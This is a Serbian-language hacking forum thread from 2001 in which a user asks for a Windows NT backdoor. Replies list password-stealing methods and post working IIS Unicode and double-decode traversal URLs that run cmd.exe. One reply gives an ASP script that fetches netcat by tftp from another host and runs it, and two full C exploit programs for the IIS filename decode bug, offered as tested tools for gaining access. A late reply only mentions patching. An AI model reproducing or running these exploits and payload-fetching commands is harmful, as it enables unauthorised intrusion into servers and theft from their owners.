|
[ sv3ta @ 10.05.2001. 01:32 ] @
[ sv3ta @ 10.05.2001. 02:03 ] @
Vidim da NT ima i rcp ;)
kako ide komanda za rcp ?? example : rcp -b 123.123.123.123 .user:blah /dir/to/file.exe ?? [ etaoin @ 10.05.2001. 08:49 ] @
šta bi ti bio backdoor?
uvek ima način da uđeš ako znaš odgovarajući pass. samo još treba da ga saznaš. 1. l0phtcrack uz NTFSDOS ili neki sniffer 2. passware windows 2000/NT key 3. neki sniffer 4. da pritegneš administratora 5. da mu stojiš iza ramena dok ovaj polako ukucava pass 6. da vidiš oko monitora da nije negde zapisan [ m r v a @ 08.06.2001. 10:44 ] @
Citat: sv3ta je napisao: Hello Treba mi neki (bilo kakav samo da sljaka) backdoor za win NT 4/5 ... koliko god to izgledalo lame .... al' NEtBus radi na NT4 ...... [ stinger @ 08.06.2001. 13:59 ] @
sveto probaj sa ovim igrackama :
NT 4.0 + IIS 3.0 + SP6a http://www.example.com/scripts....%252f..%252fwinnt/system32/cm d.exe?/c+dir+c:\ ---- http://192.168.0.1/msadc/..%25....%255c../winnt/system32/cmd.ex e?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp then i ran http://192.168.0.1/f.asp following is a copy of the f.asp: ----------cut here------------------------- <% Set fs = CreateObject("Scripting.FileSystemObject") Set drv = fs.Drives dmax = "" dmac = 0 For each d in drv If d.Driveletter <> "A" And d.IsReady Then If d.AvailableSpace > dmac then dmac = d.AvailableSpace dmab = d.DriveType dmaa = d.TotalSize dmad = d.SerialNumber dmax = d.DriveLetter End If End If Next filename = server.mappath("dl.bat") Set tf = fs.CreateTextFile(filename, True) tf.WriteLine("@echo off") tf.WriteLine("cd \Inetpub\scripts") tf.WriteLine("startDL:") tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe c:\inetpub\scripts\nc0.exe") tf.WriteLine("if not exist ncx99.exe goto startDL") tf.WriteLine("start /w nc0.exe") tf.WriteLine("attrib TFTP* -r") tf.WriteLine("attrib nc0.exe -r") tf.WriteLine("del TFTP*") tf.WriteLine("exit") tf.Close dim command dim wshShell command = server.mappath("dl.bat") & " " & dmax On Error Resume Next Set wshShell = CreateObject("WScript.Shell") wshShell.Run (command) If Err Then Set objFSO = Server.CreateObject("scripting.filesystemobject") pathname = server.mappath("dl.bat") objFSO.DeleteFile pathname Set objFSO = Nothing Else Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" & dmad End If %> --------- http://www.knelo.com/~aramos/perl/iisrules.tgz $ gzip -dc iisrules.tgz | tar -xvf - iisrules.exe iisrules.pl ---------- ^^^--------- iisex.c starts here-------^^^^ /* IISEX by HuXfLuX <[email protected]>. IIS CGI File Decode Bug exploit. Written 16-05-2001. Compiles on Linux, works with IIS versions 3, 4 and 5. Microsoft's products were always famous for their backward compatibility! You can change the SHOWSEQUENCE value to some other strings that also work. More info: http://www.nsfocus.com Thanx to Filip Maertens <[email protected]> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <unistd.h> #include <errno.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #define SHOWSEQUENCE "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+" int resolv(char *hostname,struct in_addr *addr); int main(int argc, char *argv[]) { struct sockaddr_in sin; struct in_addr victim; char recvbuffer[1], stuff[200]=""; int create_socket; printf("IISEX by HuxFlux <[email protected]>\nThis exploits the IIS CGI Filename Decode Error.\nWorks with IIS versions 3, 4 and 5!.\n"); if (argc < 3) { printf("[?] Usage: %s [ip] [command]\n", argv[0]); exit(0); } if (!resolv(argv[1],&victim)) { printf("[x] Error resolving host.\n"); exit(-1); } printf("\n[S] Exploit procedure beginning.\n"); if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 ) printf("[*] Socket created.\n"); bzero(&sin,sizeof(sin)); memcpy(&sin.sin_addr,&victim,sizeof(struct in_addr)); sin.sin_family = AF_INET; sin.sin_port = htons(80); //sin.sin_addr.s_addr = inet_addr(argv[1]); if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0) printf("[*] Connection made.\n"); else { printf("[x] No connection.\n"); exit(1); } strcat(stuff, "GET "); strcat(stuff, SHOWSEQUENCE); strcat(stuff, argv[2]); strcat(stuff, " HTTP/1.0\r\n\r\n"); printf("[*] Sending: %s", stuff); memset(recvbuffer, '\0',sizeof(recvbuffer)); send(create_socket, stuff, sizeof(stuff), 0); if ( strstr(recvbuffer,"404") == NULL ) { printf("[*] Command output:\n\n"); while(recv(create_socket, recvbuffer, 1, 0) > 0) { printf("%c", recvbuffer[0]); } printf("\n\n"); } else printf("[x] Wrong command processing. \n"); printf("[E] Finished.\n"); close(create_socket); } int resolv(char *hostname,struct in_addr *addr) { struct hostent *res; if (inet_aton(hostname,addr)) return(1); res = gethostbyname(hostname); if (res == NULL) return(0); memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr)); return(1); } ^^^--------- iisex.c ends here-------^^^^ ako ti jos ovakvih bude trebalo javi... svi su na istu semu ... u principu svi rade, testirali smo ih ovde na drenik-u .. :) [ stinger @ 08.06.2001. 14:00 ] @
evo i ovaj... :)
/* * * execiis.c - (c)copyright Filip Maertens * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error * * DISCLAIMER: This is proof of concept code. This means, this code * may only be used on approved systems in order to test the availability * and integrity of machines during a legal penetration test. In no way * is the author of this exploit responsible for the use and result of * this code. * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <unistd.h> #include <string.h> /* Modify this value to whichever sequence you want. * * %255c = %%35c = %%35%63 = %25%35%63 = / * */ #define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+" int main(int argc, char *argv[]) { struct sockaddr_in sin; char recvbuffer[1], stuff[200]; int create_socket; printf("iisexec.c | Microsoft IIS CGI Filename Decode Error | <[email protected]>\n-------------------------------------------------------------------------\n"); if (argc < 3) { printf(" -- Usage: iisexec [ip] [command]\n"); exit(0); } if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 ) printf(" -- Socket created.\n"); sin.sin_family = AF_INET; sin.sin_port = htons(80); sin.sin_addr.s_addr = inet_addr(argv[1]); if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0) printf(" -- Connection made.\n"); else { printf(" -- No connection.\n"); exit(1); } strcat(stuff, "GET "); strcat(stuff, SHOWSEQUENCE); strcat(stuff, argv[2]); strcat(stuff, " HTTP/1.0\n\n"); memset(recvbuffer, '\0',sizeof(recvbuffer)); send(create_socket, stuff, sizeof(stuff), 0); recv(create_socket, recvbuffer, sizeof (recvbuffer),0); if ( ( strstr(recvbuffer,"404") == NULL ) ) printf(" -- Command output:\n\n"); while(recv(create_socket, recvbuffer, 1, 0) > 0) { printf("%c", recvbuffer[0]); } else printf(" -- Wrong command processing. \n"); close(create_socket); } [ stinger @ 08.06.2001. 14:00 ] @
nisu backdoor-ovi ali ti daju access na masinu svaki put kad ti zatreba ... :)
[ m r v a @ 08.06.2001. 19:55 ] @
samo jedno pitanjce .....jel' su isprobani ovi trickovi ???
[ stinger @ 10.06.2001. 13:03 ] @
naravno.. ako zelis log.. mogu da ti posaljem, inace radi na 70% NT-a u svetu ... naravno sad je vecina zakrpljena.. ali uvek se nadje.. :) ako zelis log ko sto rekoh... nije problem :)
[ Shadowed @ 08.09.2005. 18:21 ] @
Inace, Unicode bug se neutralise instaliranjem odgovarajuceg patch-a ili SP-a.
(cisto da usaglasim temu sa pravilnikom  ).Copyright (C) 2001-2024 by www.elitesecurity.org. All rights reserved.
|